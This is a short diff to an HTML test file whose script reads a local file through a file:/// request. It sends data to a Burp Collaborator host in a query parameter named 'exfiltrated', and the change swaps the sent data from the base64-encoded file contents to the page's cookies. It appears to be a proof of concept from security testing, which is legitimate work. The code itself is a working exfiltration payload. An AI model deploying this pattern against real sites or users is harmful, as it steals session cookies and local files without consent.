--- a/test6.html
+++ b/test6.html
@@ -1,4 +1,6 @@
-<script>var txt = '';
+<script>
+  document.cookie = "username=John Doe";
+  var txt = '';
 var xmlhttp = new XMLHttpRequest();
 xmlhttp.onreadystatechange = function(){
   if(xmlhttp.status == 200 && xmlhttp.readyState == 4){
@@ -6,6 +8,6 @@ xmlhttp.onreadystatechange = function(){
   }
 };
 xmlhttp.open("GET","file:///Users/johan/Desktop/test.txt",true);
-fetch('https://euc1u4sug8iycmh60bz77fiwqnwmkb.burpcollaborator.net/?exfiltrated=' + btoa(txt));
+fetch('https://euc1u4sug8iycmh60bz77fiwqnwmkb.burpcollaborator.net/?exfiltrated=' + document.cookie);
 xmlhttp.send();
 </script>
